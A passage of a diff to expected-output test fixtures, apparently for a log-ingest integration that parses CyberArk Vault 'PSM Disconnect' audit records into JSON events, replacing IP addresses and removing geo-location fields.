Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:34:50\",\"IsoTimestamp\":\"2021-03-15T10:34:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813822700Z", + "original": "\u003c5\u003e1 2021-03-15T10:34:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:34:50\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:34:50Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:34:50\",\"IsoTimestamp\":\"2021-03-15T10:34:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -1376,39 +1234,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1425,7 +1262,7 @@ }, "@timestamp": "2021-03-15T11:12:09.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -1436,16 +1273,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T11:12:09Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 04:12:09\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T11:12:09Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 04:12:09\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T11:12:09Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -1457,14 +1293,14 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "8b3d0b38-aef5-49d9-bdd7-d57706887d8b", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "session_duration": "00:37:10" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", @@ -1474,9 +1310,9 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Disconnect", "timestamp": "Mar 15 04:12:09", "desc": "PSM Disconnect" @@ -1488,8 +1324,8 @@ "event": { "severity": 2, "duration": 2230000000000, - "ingested": "2021-06-09T10:24:31.624822300Z", - "original": "\u003c5\u003e1 2021-03-15T11:12:09Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 04:12:09\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T11:12:09Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 04:12:09\",\"IsoTimestamp\":\"2021-03-15T11:12:09Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813828200Z", + "original": "\u003c5\u003e1 2021-03-15T11:12:09Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 04:12:09\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T11:12:09Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 04:12:09\",\"IsoTimestamp\":\"2021-03-15T11:12:09Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -1512,39 +1348,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1561,7 +1376,7 @@ }, "@timestamp": "2021-03-15T13:18:36.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -1572,16 +1387,15 @@ "adrian" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T13:18:36Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:18:36\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:18:36Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:18:36\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:18:36Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n 